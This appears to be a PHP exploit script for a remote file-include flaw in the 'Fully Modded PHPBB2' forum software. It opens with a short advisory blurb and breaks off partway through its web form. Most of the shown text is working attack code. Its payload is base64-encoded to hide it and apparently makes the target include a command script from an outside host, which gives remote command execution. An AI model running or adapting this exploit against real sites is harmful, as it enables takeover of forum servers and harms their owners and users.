source: https://www.securityfocus.com/bid/23565/info Fully Modded PHPBB2 is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible. */ /* Website : WwW.SoQoR.NeT */ /************************************************/ error_reporting(0); ini_set("max_execution_time",0); Function get_page($url){if(function_exists("file_get_contents")){$contents=file_get_contents($url);}else{$fp=fopen("$url","r");while($line=fread($fp,1024)){$contents=$contents .$line;}}return$contents;} Echo "\nFully Moded PHPBB2 Command Execution Exploit by : HACKERS PAL :: WwW.SoQoR.NeT ::\n\r"."

Fully Moded PHPBB2 Command Execution\n\r"."

By : HACKERS PAL [security@soqor.net]\n\r"."

VisiT My Website [WwW.SoQoR.NeT]\n\r"; $expl=base64_decode("c3Vic2NwLnBocD9waHBiYl9yb290X3BhdGg9aHR0cDovL3BzZXZpbC5nb29nbGVwYWdlcy5jb20vY21kLnR4dD8="); $action=$_GET['action']; if($action == "") { echo "
\n Web URL -- Example : http://localhost/FullyModed\n
\n

\n Command :